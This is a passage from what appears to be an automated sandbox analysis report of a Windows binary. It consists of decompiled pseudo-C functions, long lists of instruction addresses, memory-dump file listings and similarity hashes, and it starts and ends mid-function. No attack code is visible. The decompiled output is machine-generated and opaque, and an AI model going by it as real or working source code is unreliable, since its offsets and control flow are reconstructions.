														if( *((char*)(_t706 - 0x219c)) == 0) {
															L59:
															 *(_t706 + 0xf) = 0;
															goto L61;
														}
														_t102 = _t706 - 0x2198; // -6552
														_t547 = E001F7B9D(_t102, _t683);
														__eflags = _t547;
														if(_t547 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t692 - _t668;
													if(_t692 != _t668) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t398 + 0x6154));
												if( *((char*)(_t398 + 0x6154)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t683 + 0x10f6);
											if( *(_t683 + 0x10f6) == 0) {
												goto L50;
											}
											 *(_t706 + 0xf) = 1;
											__eflags =  *(_t574 + 0x3318);
											if( *(_t574 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t692 - _t387;
										_t388 = 1;
										if(_t692 != _t387) {
											goto L46;
										}
										goto L45;
									}
									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
									 *(_t706 + 0xb) = _t671;
									 *(_t706 + 0xc) = _t671;
									__eflags = _t671;
									if(_t671 == 0) {
										goto L214;
									} else {
										_t667 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
									goto L29;
								}
								__eflags =  *((char*)(_t683 + 0xf1));
								if( *((char*)(_t683 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t574 + 0x32e0) = _t665;
								 *(_t574 + 0x32e4) = _t665;
								goto L26;
							}
							__eflags =  *(_t574 + 0x32e0) - _t665;
							if( *(_t574 + 0x32e0) >= _t665) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t574 + 0x32d8) = _t665;
							 *(_t574 + 0x32dc) = _t665;
							goto L22;
						}
						__eflags =  *(_t574 + 0x32d8) - _t665;
						if( *(_t574 + 0x32d8) >= _t665) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t690 - 3;
					if(_t690 != 3) {
						L10:
						__eflags = _t690 - 5;
						if(_t690 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t574 + 0x45ac));
						if( *((char*)(_t574 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t706 - 0x18));
						_push(0);
						_push(_t683 + 0x10);
						_push(_t574);
						_t564 = E002080D0(_t665);
						__eflags = _t564;
						if(_t564 != 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
							goto L15;
						} else {
							E001F6E03(0x2300e0, 1);
							goto L219;
						}
					}
					__eflags =  *(_t683 + 0x10f5);
					if( *(_t683 + 0x10f5) == 0) {
						goto L217;
					} else {
						E001F79A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
					L4:
					_t393 = 0;
					goto L17;
				}
				_push(_t370);
				_push(0);
				_push(_t683 + 0x10);
				_push(_t574);
				if(E002080D0(0) != 0) {
					_t665 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E001F6E03(0x2300e0, 1);
					goto L4;
				}
			}
























































































          0x001f83c0
          0x001f83c5
          0x001f83cf
          0x001f83d5
          0x001f83d8
          0x001f83db
          0x001f83dd
          0x001f83e3
          0x001f83ea
          0x001f83f0
          0x001f841c
          0x001f841d
          0x001f8423
          0x001f8426
          0x001f84b5
          0x001f84bb
          0x001f84c1
          0x001f84d9
          0x001f84d9
          0x001f84df
          0x001f84f7
          0x001f84f7
          0x001f84fa
          0x001f8500
          0x001f851d
          0x001f8522
          0x001f8526
          0x001f8530
          0x001f853b
          0x001f8540
          0x001f8542
          0x001f8545
          0x001f8548
          0x001f854a
          0x001f854c
          0x001f8550
          0x001f8552
          0x001f8554
          0x001f8554
          0x001f8550
          0x001f855c
          0x001f8561
          0x001f8562
          0x001f856f
          0x001f8570
          0x001f8578
          0x001f857f
          0x001f8582
          0x001f85d9
          0x001f85de
          0x001f85e0
          0x001f85e2
          0x001f85e8
          0x001f85ee
          0x001f85f2
          0x001f85f2
          0x001f85f2
          0x001f85f2
          0x001f8584
          0x001f8587
          0x001f858d
          0x001f858f
          0x001f8591
          0x001f8595
          0x001f8597
          0x001f859e
          0x001f85a3
          0x001f85a4
          0x001f85ab
          0x001f85b0
          0x001f85ba
          0x001f85bc
          0x001f85d2
          0x001f85be
          0x001f85c0
          0x001f85c7
          0x001f85c9
          0x001f85c9
          0x001f85bc
          0x001f8595
          0x001f858f
          0x001f85fb
          0x001f8600
          0x001f8618
          0x001f8622
          0x001f8625
          0x001f8627
          0x001f862b
          0x001f862e
          0x001f8631
          0x001f8634
          0x001f864c
          0x001f864f
          0x001f8654
          0x001f865a
          0x001f865b
          0x001f865d
          0x001f8666
          0x001f8666
          0x001f8668
          0x001f866b
          0x001f8675
          0x001f867c
          0x001f8681
          0x001f8683
          0x001f9042
          0x001f9042
          0x001f84a2
          0x001f84a3
          0x001f84a8
          0x001f84b2
          0x001f84b2
          0x001f8697
          0x001f869a
          0x001f86a2
          0x001f86a9
          0x001f86ac
          0x001f86c3
          0x001f86c3
          0x001f86c6
          0x001f86c6
          0x001f86cb
          0x001f86ce
          0x001f86d5
          0x001f86d6
          0x001f86d9
          0x001f86dc
          0x001f86e7
          0x001f86e7
          0x001f86ea
          0x001f86f1
          0x001f86f1
          0x001f86f7
          0x001f86fe
          0x001f86ff
          0x001f870d
          0x001f8712
          0x001f8714
          0x001f874c
          0x001f874f
          0x001f875b
          0x001f875b
          0x001f875b
          0x001f875e
          0x001f875e
          0x001f8768
          0x001f876d
          0x001f876f
          0x001f8793
          0x001f8793
          0x001f879a
          0x00000000
          0x00000000
          0x001f879c
          0x001f87a6
          0x001f87ab
          0x001f87ad
          0x001f888c
          0x00000000
          0x001f888c
          0x001f87b3
          0x001f87b6
          0x001f87c4
          0x001f87c5
          0x001f87c5
          0x001f87c7
          0x001f87d0
          0x001f87d3
          0x001f87df
          0x001f87f2
          0x001f87fc
          0x001f880e
          0x001f8813
          0x001f881a
          0x001f88b0
          0x001f88b0
          0x001f88b4
          0x001f88ba
          0x001f88bf
          0x001f88c5
          0x001f88ca
          0x001f88d0
          0x001f88d7
          0x001f88dc
          0x001f88dd
          0x001f88df
          0x001f8972
          0x001f8974
          0x001f8979
          0x001f897b
          0x001f89cd
          0x001f89d0
          0x001f89d2
          0x001f89f6
          0x001f89f9
          0x001f89f9
          0x001f8a00
          0x001f8a38
          0x001f8a3a
          0x001f8ff7
          0x001f8ff7
          0x001f8ffb
          0x001f9001
          0x001f9006
          0x001f900a
          0x001f900d
          0x001f9010
          0x001f9012
          0x001f9012
          0x001f9012
          0x001f9012
          0x001f9018
          0x001f9018
          0x001f901c
          0x00000000
          0x00000000
          0x001f901e
          0x001f9020
          0x001f84a0
          0x001f84a0
          0x00000000
          0x001f84a0
          0x001f9026
          0x001f902c
          0x001f903a
          0x001f903c
          0x00000000
          0x00000000
          0x00000000
          0x001f903c
          0x001f902e
          0x001f9030
          0x00000000
          0x001f9030
          0x001f8a40
          0x001f8a40
          0x001f8a43
          0x001f8a4a
          0x001f8a5c
          0x001f8a5c
          0x001f8a5f
          0x001f8a61
          0x001f8aa8
          0x001f8aa8
          0x001f8aac
          0x001f8aae
          0x001f8ab6
          0x001f8ab6
          0x001f8aca
          0x001f8ad0
          0x001f8ad6
          0x001f8adc
          0x001f8aed
          0x001f8b03
          0x001f8b0e
          0x001f8b17
          0x001f8b1a
          0x001f8b21
          0x001f8b27
          0x001f8b2c
          0x001f8b2f
          0x001f8b31
          0x001f8b34
          0x001f8b37
          0x001f8b3a
          0x001f8b3d
          0x001f8b40
          0x001f8b42
          0x001f8be5
          0x001f8be5
          0x001f8be8
          0x001f8bef
          0x001f8bf6
          0x001f8bfa
          0x001f8c10
          0x001f8c12
          0x001f8c12
          0x001f8c13
          0x001f8c13
          0x001f8c17
          0x001f8c1a
          0x001f8c1d
          0x001f8c20
          0x001f8d2c
          0x001f8d33
          0x001f8d35
          0x001f8d3c
          0x001f8d66
          0x001f8d6b
          0x001f8d7d
          0x001f8d83
          0x001f8d85
          0x001f8d8b
          0x001f8da5
          0x001f8d3e
          0x001f8d3e
          0x001f8d44
          0x001f8d4a
          0x001f8d4b
          0x001f8d4b
          0x001f8d3c
          0x001f8daa
          0x001f8dac
          0x001f8db1
          0x001f8db8
          0x001f8dea
          0x001f8dea
          0x001f8dea
          0x001f8dec
          0x001f8dee
          0x001f8dee
          0x001f8df5
          0x001f8dff
          0x001f8e06
          0x001f8e25
          0x001f8e25
          0x001f8e29
          0x001f8e2c
          0x001f8e8d
          0x001f8e8d
          0x001f8e91
          0x001f8e94
          0x001f8ea7
          0x001f8ea7
          0x001f8ea7
          0x001f8ea9
          0x001f8ea9
          0x001f8ead
          0x00000000
          0x00000000
          0x001f8eb3
          0x001f8eb6
          0x001f8eba
          0x001f8ec6
          0x001f8ec6
          0x001f8eca
          0x001f8ee5
          0x001f8ee5
          0x001f8ee7
          0x001f8efc
          0x001f8efc
          0x001f8efe
          0x001f8fc2
          0x001f8fc2
          0x001f8fc5
          0x001f8fcc
          0x001f8fd4
          0x001f8fdb
          0x001f8fe0
          0x001f8fe2
          0x001f8feb
          0x001f8feb
          0x001f8fe2
          0x001f8ff0
          0x00000000
          0x001f8ff0
          0x001f8f04
          0x001f8f09
          0x001f8f0b
          0x001f8f0e
          0x001f8f14
          0x001f8f14
          0x001f8f16
          0x001f8f28
          0x001f8f28
          0x001f8f2e
          0x001f8f33
          0x001f8f3c
          0x001f8f50
          0x001f8f57
          0x001f8f6a
          0x001f8f6c
          0x001f8f75
          0x001f8f7a
          0x001f8f80
          0x001f8f8f
          0x001f8fa2
          0x001f8fb5
          0x001f8fb7
          0x001f8fba
          0x001f8fbf
          0x00000000
          0x001f8fbf
          0x001f8f18
          0x001f8f1e
          0x00000000
          0x00000000
          0x001f8f20
          0x001f8f26
          0x00000000
          0x00000000
          0x00000000
          0x001f8f26
          0x001f8f10
          0x001f8f12
          0x00000000
          0x00000000
          0x00000000
          0x001f8f12
          0x001f8ee9
          0x001f8eec
          0x001f8ef3
          0x00000000
          0x00000000
          0x001f8ef9
          0x00000000
          0x001f8ef9
          0x001f8ecc
          0x001f8ece
          0x00000000
          0x00000000
          0x001f8ed0
          0x001f8ed7
          0x00000000
          0x00000000
          0x001f8edd
          0x001f8edf
          0x00000000
          0x00000000
          0x00000000
          0x001f8edf
          0x001f8ebc
          0x001f8ec0
          0x00000000
          0x00000000
          0x00000000
          0x001f8ec0
          0x001f8e96
          0x001f8e9d
          0x00000000
          0x00000000
          0x001f8e9f
          0x001f8ea1
          0x00000000
          0x00000000
          0x001f8ea3
          0x00000000
          0x001f8ea3
          0x001f8e2e
          0x001f8e32
          0x00000000
          0x00000000
          0x001f8e34
          0x001f8e36
          0x00000000
          0x00000000
          0x001f8e38
          0x001f8e3e
          0x001f8e68
          0x001f8e68
          0x001f8e72
          0x001f8e73
          0x001f8e75
          0x001f8e75
          0x001f8e81
          0x001f8e85
          0x001f8e8a
          0x00000000
          0x001f8e8a
          0x001f8e40
          0x001f8e46
          0x001f8e50
          0x001f8e50
          0x001f8e57
          0x00000000
          0x00000000
          0x001f8e59
          0x001f8e63
          0x001f8e64
          0x00000000
          0x001f8e64
          0x001f8e48
          0x001f8e4e
          0x00000000
          0x00000000
          0x00000000
          0x001f8e4e
          0x001f8e08
          0x001f8e0e
          0x00000000
          0x00000000
          0x001f8e10
          0x001f8e1a
          0x001f8e1a
          0x001f8e1c
          0x001f8e1e
          0x001f8e1e
          0x00000000
          0x001f8e1c
          0x001f8e12
          0x001f8e18
          0x00000000
          0x00000000
          0x00000000
          0x001f8e18
          0x001f8df7
          0x00000000
          0x001f8df7
          0x001f8dcf
          0x001f8ddb
          0x001f8de0
          0x001f8de2
          0x00000000
          0x00000000
          0x001f8de4
          0x001f8de6
          0x00000000
          0x001f8de6
          0x001f8c26
          0x001f8c2c
          0x001f8c2f
          0x001f8c98
          0x001f8c9d
          0x001f8cae
          0x001f8cb3
          0x001f8cb6
          0x001f8cb8
          0x001f8d05
          0x001f8d05
          0x001f8d08
          0x001f8d08
          0x001f8d0f
          0x001f8c64
          0x001f8c64
          0x001f8c66
          0x001f8d22
          0x001f8d22
          0x001f8d22
          0x001f8d24
          0x001f8d24
          0x00000000
          0x001f8d24
          0x001f8c6c
          0x001f8c6c
          0x001f8c6e
          0x00000000
          0x00000000
          0x001f8c76
          0x00000000
          0x001f8c76
          0x001f8d15
          0x001f8d17
          0x00000000
          0x00000000
          0x001f8c60
          0x001f8c60
          0x00000000
          0x001f8c60
          0x001f8cba
          0x001f8cc2
          0x00000000
          0x00000000
          0x001f8cc4
          0x001f8cca
          0x001f8cd6
          0x001f8cd7
          0x001f8cda
          0x001f8ce8
          0x001f8ce9
          0x001f8cf0
          0x001f8cdc
          0x001f8cdc
          0x001f8cdc
          0x001f8cf5
          0x001f8cf5
          0x001f8cf8
          0x001f8cfa
          0x001f8c5d
          0x001f8c5d
          0x00000000
          0x001f8c5d
          0x001f8d00
          0x00000000
          0x001f8d00
          0x001f8c31
          0x001f8c34
          0x00000000
          0x00000000
          0x001f8c36
          0x001f8c38
          0x001f8c7c
          0x001f8c7c
          0x001f8c7e
          0x00000000
          0x00000000
          0x001f8c8a
          0x001f8c91
          0x00000000
          0x001f8c91
          0x001f8c3a
          0x001f8c3d
          0x00000000
          0x00000000
          0x001f8c3f
          0x001f8c42
          0x00000000
          0x00000000
          0x001f8c51
          0x001f8c56
          0x001f8c58
          0x001f8c5a
          0x00000000
          0x001f8c5a
          0x001f8bfc
          0x001f8bfe
          0x00000000
          0x00000000
          0x001f8c02
          0x001f8c03
          0x001f8c07
          0x00000000
          0x00000000
          0x001f8c0b
          0x001f8c0c
          0x00000000
          0x001f8c0c
          0x001f8b48
          0x001f8b4e
          0x00000000
          0x00000000
          0x001f8b54
          0x001f8b5a
          0x001f8b60
          0x001f8b62
          0x001f8be2
          0x001f8be2
          0x00000000
          0x001f8be2
          0x001f8b64
          0x001f8b6e
          0x001f8b6e
          0x001f8b7e
          0x001f8b81
          0x001f8b83
          0x001f8bdd
          0x001f8bdd
          0x001f8be0
          0x001f8be0
          0x00000000
          0x001f8be0
          0x001f8b85
          0x001f8b8b
          0x001f8b8d
          0x001f8b8f
          0x001f8bb4
          0x001f8bba
          0x001f8bc6
          0x001f8bd1
          0x001f8bda
          0x00000000
          0x001f8bda
          0x001f8b91
          0x001f8b9b
          0x001f8b9d
          0x001f8ba2
          0x001f8ba8
          0x00000000
          0x00000000
          0x001f8baa
          0x00000000
          0x00000000
          0x001f8bac
          0x001f8bb2
          0x00000000
          0x00000000
          0x00000000
          0x001f8bb2
          0x001f8b93
          0x001f8b99
          0x00000000
          0x00000000
          0x00000000
          0x001f8b99
          0x001f8b87
          0x001f8b89
          0x00000000
          0x00000000
          0x00000000
          0x001f8b89
          0x001f8b66
          0x001f8b6c
          0x00000000
          0x00000000
          0x00000000
          0x001f8b6c
          0x001f8ab0
          0x001f8ab0
          0x001f8ab0
          0x001f8ab0
          0x00000000
          0x001f8ab0
          0x001f8a67
          0x001f8a6a
          0x001f8a6b
          0x001f8a6e
          0x001f8a70
          0x001f8a7b
          0x001f8a7d
          0x001f8a8c
          0x001f8a9e
          0x001f8a9e
          0x001f8a7d
          0x00000000
          0x001f8a6e
          0x001f8a4c
          0x001f8a53
          0x001f8a5a
          0x001f8aa5
          0x00000000
          0x001f8aa5
          0x00000000
          0x001f8a5a
          0x001f8a06
          0x001f8a09
          0x001f8a10
          0x001f8a17
          0x001f8a1c
          0x001f8a1e
          0x00000000
          0x00000000
          0x001f8a20
          0x001f8a22
          0x001f8a25
          0x001f8a25
          0x001f8a2b
          0x001f8a30
          0x00000000
          0x001f8a30
          0x001f89d4
          0x001f89dd
          0x001f89de
          0x001f89e3
          0x001f89e6
          0x001f89e8
          0x001f89f0
          0x001f89f0
          0x001f89f2
          0x00000000
          0x00000000
          0x00000000
          0x001f89f4
          0x001f897d
          0x001f8981
          0x001f8987
          0x001f898a
          0x001f898e
          0x001f8996
          0x001f8997
          0x001f899a
          0x001f89a2
          0x001f89a3
          0x001f89a6
          0x001f89a8
          0x001f89ae
          0x001f89b4
          0x001f89b6
          0x001f89bc
          0x001f89c3
          0x001f89c6
          0x001f89c6
          0x001f89b4
          0x001f89a6
          0x001f899a
          0x001f898e
          0x00000000
          0x001f8981
          0x001f88e5
          0x001f88e8
          0x00000000
          0x00000000
          0x001f88ee
          0x001f88f1
          0x001f88f4
          0x001f88f6
          0x00000000
          0x00000000
          0x001f88fc
          0x001f88ff
          0x00000000
          0x00000000
          0x001f8905
          0x001f8908
          0x001f890f
          0x00000000
          0x00000000
          0x001f8917
          0x001f8921
          0x001f8926
          0x001f8928
          0x001f895f
          0x001f895f
          0x001f8963
          0x001f89ed
          0x00000000
          0x001f89ed
          0x001f8969
          0x001f896b
          0x001f896d
          0x00000000
          0x001f896d
          0x001f892a
          0x001f892e
          0x00000000
          0x00000000
          0x001f8930
          0x001f8938
          0x001f8939
          0x001f8940
          0x001f895a
          0x00000000
          0x001f895a
          0x001f8820
          0x001f8827
          0x00000000
          0x00000000
          0x001f882f
          0x001f883a
          0x001f883f
          0x001f8842
          0x001f8844
          0x00000000
          0x00000000
          0x001f8846
          0x001f884d
          0x00000000
          0x00000000
          0x001f884f
          0x001f8856
          0x001f8860
          0x001f8861
          0x001f8898
          0x001f889a
          0x001f88a6
          0x001f88ab
          0x001f88ad
          0x00000000
          0x001f88ad
          0x001f8863
          0x001f8865
          0x001f8873
          0x001f8878
          0x001f887c
          0x001f8882
          0x001f8882
          0x001f8793
          0x001f8778
          0x001f877f
          0x001f8784
          0x001f878b
          0x00000000
          0x001f878b
          0x001f871d
          0x001f8723
          0x001f8728
          0x001f872a
          0x00000000
          0x00000000
          0x001f872c
          0x001f8733
          0x001f8745
          0x001f8747
          0x00000000
          0x001f8747
          0x001f8736
          0x001f873c
          0x001f8741
          0x001f8743
          0x00000000
          0x00000000
          0x00000000
          0x001f8743
          0x001f86ec
          0x001f86ef
          0x00000000
          0x00000000
          0x00000000
          0x001f86ef
          0x001f86de
          0x001f86e5
          0x00000000
          0x00000000
          0x00000000
          0x001f86e5
          0x001f86ae
          0x001f86b5
          0x00000000
          0x00000000
          0x001f86b7
          0x001f86bb
          0x001f86c1
          0x00000000
          0x00000000
          0x00000000
          0x001f86c1
          0x001f865f
          0x001f8662
          0x001f8664
          0x00000000
          0x00000000
          0x00000000
          0x001f8664
          0x001f8636
          0x001f863c
          0x001f863f
          0x001f8642
          0x001f8644
          0x00000000
          0x001f864a
          0x001f864a
          0x001f864a
          0x00000000
          0x001f864a
          0x001f8644
          0x001f8508
          0x001f850e
          0x00000000
          0x00000000
          0x001f8510
          0x001f8517
          0x00000000
          0x00000000
          0x00000000
          0x001f8517
          0x001f84e1
          0x001f84eb
          0x001f84eb
          0x001f84f1
          0x00000000
          0x001f84f1
          0x001f84e3
          0x001f84e9
          0x00000000
          0x00000000
          0x00000000
          0x001f84e9
          0x001f84c3
          0x001f84cd
          0x001f84cd
          0x001f84d3
          0x00000000
          0x001f84d3
          0x001f84c5
          0x001f84cb
          0x00000000
          0x00000000
          0x00000000
          0x001f84cb
          0x001f842c
          0x001f842f
          0x001f844e
          0x001f844e
          0x001f8451
          0x00000000
          0x00000000
          0x001f8457
          0x001f845e
          0x00000000
          0x00000000
          0x001f8469
          0x001f846a
          0x001f846e
          0x001f846f
          0x001f8470
          0x001f8475
          0x001f8477
          0x001f848c
          0x001f849d
          0x00000000
          0x001f8479
          0x001f8480
          0x00000000
          0x001f8480
          0x001f8477
          0x001f8431
          0x001f8438
          0x00000000
          0x001f843e
          0x001f8449
          0x00000000
          0x001f8449
          0x001f8438
          0x001f83f5
          0x001f8413
          0x001f8413
          0x00000000
          0x001f8413
          0x001f83f7
          0x001f83f8
          0x001f83fc
          0x001f83fd
          0x001f8405
          0x001f841a
          0x001f841a
          0x00000000
          0x001f8407
          0x001f840e
          0x00000000
          0x001f840e

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog_memcmp
          • String ID:
          • API String ID: 3004599000-0
          • Opcode ID: 64463a1885801266d07ed4c6efabef87ad16a8abc224671d97c0ecfda93614bb
          • Instruction ID: f197d60e9a11a7e6e600aa5cf1c3ed831768f587f7f7bb602e5bf7796f54102b
          • Opcode Fuzzy Hash: 64463a1885801266d07ed4c6efabef87ad16a8abc224671d97c0ecfda93614bb
          • Instruction Fuzzy Hash: A4820A7190428DAEDF15DF64C885BFABBA9BF15300F0841BAEE499B143DF315A85CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020E643, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020E643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0020E64F); // executed
				return _t1;
			}




          0x0020e648
          0x0020e64e

          APIs
          • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,0020E084), ref: 0020E648
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: bfdad2e2da54a38a912f59c16158c691f90d6527444dc3cf3f00a5066146b99f
          • Instruction ID: a58043cb4b56084e6f0cd7d46243bcabdfd30401038d25a151e6701796224130
          • Opcode Fuzzy Hash: bfdad2e2da54a38a912f59c16158c691f90d6527444dc3cf3f00a5066146b99f
          • Instruction Fuzzy Hash:
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020626D, Relevance: .3, Instructions: 325COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 98%
          			E0020626D(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E00202A7F(__ecx, __edx); // executed
				E002042D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E0020EA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_push(0x00400000 - _t263 & 0xfffffff0);
					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
					_t161 = E001FC70F();
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E001FA4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E002033D3(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
